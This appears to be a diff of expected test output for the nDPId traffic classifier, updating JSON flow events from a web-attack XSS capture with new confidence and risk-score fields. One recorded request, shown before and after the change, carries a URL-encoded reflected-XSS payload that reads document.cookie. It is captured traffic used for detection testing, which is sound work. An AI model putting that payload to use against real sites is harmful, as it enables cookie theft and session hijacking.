-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347801271,"flow_last_seen":1499347806841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347801271,"flow_last_seen":1499347806841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347801271,"flow_last_seen":1499347806841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347802549,"flow_last_seen":1499347807841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347802549,"flow_last_seen":1499347807841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347802549,"flow_last_seen":1499347807841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347927657,"flow_last_seen":1499347927657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347927657,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7972,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1499347927657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347927657,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NcxAAD4GkASsEAABwKgKMoVuAFCXD6SrAAAAAKACchAK5wAAAgQFtAQCCAoBPJFnAAAAAAEDAwc="}
@@ -3256,19 +3256,19 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1499347936727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347936727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IMJAAD4GpQ6sEAABwKgKMoXMAFAQdrqBAAAAAKACchBycAAAAgQFtAQCCAoBPJpDAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":2,"flow_last_seen":1499347936727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347936727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhcyowg88EHa6gqAScSBLswAAAgQFtAQCCAoD5mu3ATyaQwEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8046,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":3,"flow_last_seen":1499347936728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347936728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IMNAAD4GpRWsEAABwKgKMoXMAFAQdrqCqMIPPYAQAOXqugAAAQEICgE8mkMD5mu3"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347805119,"flow_last_seen":1499347810842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347805119,"flow_last_seen":1499347810842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347805119,"flow_last_seen":1499347810842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347806390,"flow_last_seen":1499347811528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347806390,"flow_last_seen":1499347811528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347806390,"flow_last_seen":1499347811528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347812797,"flow_last_seen":1499347817844,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347812797,"flow_last_seen":1499347817844,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347812797,"flow_last_seen":1499347817844,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347814066,"flow_last_seen":1499347819845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347814066,"flow_last_seen":1499347819845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347814066,"flow_last_seen":1499347819845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347743331,"flow_last_seen":1499347811268,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":747,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347743331,"flow_last_seen":1499347811268,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":747,"midstream":0,"ts_msec":1499347937740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347939286,"flow_last_seen":1499347939286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347939286,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1499347939286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347939286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86O9AAD4G3OCsEAABwKgKMoXmAFBSpnQtAAAAAKACchBz+wAAAgQFtAQCCAoBPJzCAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":2,"flow_last_seen":1499347939286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347939286,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQheYnhiyyUqZ0LqAScSCuhQAAAgQFtAQCCAoD5m42ATycwgEDAwc="}
@@ -3277,7 +3277,7 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1499347940593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347940593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87cVAAD4G2AqsEAABwKgKMoX0AFCR9XPMAAAAAKACchAzuAAAAgQFtAQCCAoBPJ4JAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":2,"flow_last_seen":1499347940593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347940593,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhfTE5Ae8kfVzzaAScSD0kgAAAgQFtAQCCAoD5m99ATyeCQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":3,"flow_last_seen":1499347940594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347940594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07cZAAD4G2BGsEAABwKgKMoX0AFCR9XPNxOQHvYAQAOWTmgAAAQEICgE8ngkD5m99"}
-01005{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347939286,"flow_last_seen":1499347941874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347941874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27TNRH0PFRPCFVXECFZU2OUYBTDZQVIWB8HBZ1VC7EXA9PGMGBWA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347939286,"flow_last_seen":1499347941874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347941874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27TNRH0PFRPCFVXECFZU2OUYBTDZQVIWB8HBZ1VC7EXA9PGMGBWA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347943146,"flow_last_seen":1499347943146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347943146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1499347943146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347943146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TwNAAD4Gds2sEAABwKgKMoYOAFBjnu+EAAAAAKACchDjvgAAAgQFtAQCCAoBPKCHAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":2,"flow_last_seen":1499347943146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347943146,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhg4T7s6FY57vhaAScSCMRwAAAgQFtAQCCAoD5nH8ATyghwEDAwc="}
@@ -3290,17 +3290,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1499347945720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347945720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sjdAAD4GE5msEAABwKgKMoYqAFDdpBE8AAAAAKACchBFYQAAAgQFtAQCCAoBPKMLAAAAAAEDAwc="}
